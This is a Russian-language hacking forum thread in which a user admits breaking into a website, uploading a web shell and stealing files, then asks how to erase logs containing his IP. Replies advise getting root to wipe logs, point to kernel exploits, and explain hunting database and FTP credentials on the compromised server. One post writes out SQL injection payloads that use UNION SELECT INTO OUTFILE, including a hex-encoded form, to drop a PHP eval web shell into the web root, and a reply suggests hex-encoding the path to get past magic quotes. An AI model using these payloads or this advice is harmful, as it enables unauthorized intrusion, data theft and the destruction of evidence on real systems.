Ваши вопросы по уязвимостям.

В общем, по своей дурости, сегодня взломал сайт не включив впн
Залил шелл, погулял по папкам, заливал файлы, читал файлы, скачивал.

После завершения работы естественно решил вырубить впн, но как оказалось он не был включен...

Как мне почистить логи, особенно со своим ip?

+++
Если не там запостил, извините, не знал куда можно запостить.


Эри, они вроде делали всякие скрипты, посмотри на хакер.ру, там есть какое-то скучное интервью с участником rht.

 

бери root и чисти логи, другово не знаю не дано

 

Как не подскажешь?

Версия ядра - Linux Kernel 2.6.18

 

можно что выжать?

 

нет.

Можешь администрации посоветовать выключить вывод ошибок.

посмотри следующие темы:

/showthread.php?t=121272
/showthread.php?t=30711
http://www.1337day.com/exploits/17158

 

Буржуйский сайт? Тогда спи спокойно.
Котенок Кисс думает... сделав тройное сальто, говорит, что надо сказать о уязвимости админам, тогда они поблагодарят тебя, а ты спасаешь жопу. Уж блиц-то знает, с такой датой регистрации в интернете.

 

Та мало ли, вдруг ему нужно не целые таблицы а некоторые колонки из них.

естественно есть, а как по твоему скрипт выводит инфу из базы?
тебе ещо раз говорят, просмотри все файлы что инклудятся в скрипте, там в какомто из них будут данные от БД

 

маленький ввопросец, ато гугл не помог, где на сервере хранятся пароли от фтп?

 

Смотри какой фтп серв используется, далее гугли дефолтные конфиги(пути) для него, а хитрожопый админ может засунуть и оч глубоко конфиг.

 

Я даже проксей не юзаю, за мной выехали?

 

Вот как то так. Что теперь мне делать?

 

cc, gpp, cpp пробуй

 

------------

 

kise, тащи эти файлы с собой stdio и.т.д этих заголовочных файлов на серве нет, но судя по тому что ошибки лезут компилятор таки есть.

 

Что можно извлечь из файла etc/passwd ато там столько всего что можно голову сломать?

 

http://ru.wikipedia.org/wiki/Salt#.D0.A3.D1.80.D0.BE.D0.B2.D0.BD.D0.B8_.D0.B7.D0.B0.D1.89.D0.B8.D1.82.D1.8B
И реши что именно тебе надо и надо ли вообще.

 

Столкнулся вот с токой проблеммой,чтобы прочитать файл нужно путь к файлу представить в hex,а теперь сижу и ломаю голову а как же теперь шела залить обычным запросом +union+select+1,2,3,'<?php eval($_GET[‘e’]) ?>',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+into+outfile+'/var/www/html/azaz.html'-- не получается пробовал уже и так +union+select+1,2,3,0x3c3f706870206576616c28245f4745545be2809865e280995d29203f3e,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+into+outfile+'/var/www/html/azaz.html'--
и даже так +union+select+1,2,3,'0x3c3f706870206576616c28245f4745545be2809865e280995d29203f3e',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+into+outfile+'/var/www/html/azaz.html'-- ничего не выходит.Помогите пожалуйста

 

Если это магические ковычки, то +'/var/www/html/azaz.html'- тоже хексить надо.

 

File_priv Y а как проверить права на папку куда лить шелл?

 

Вот дерьмо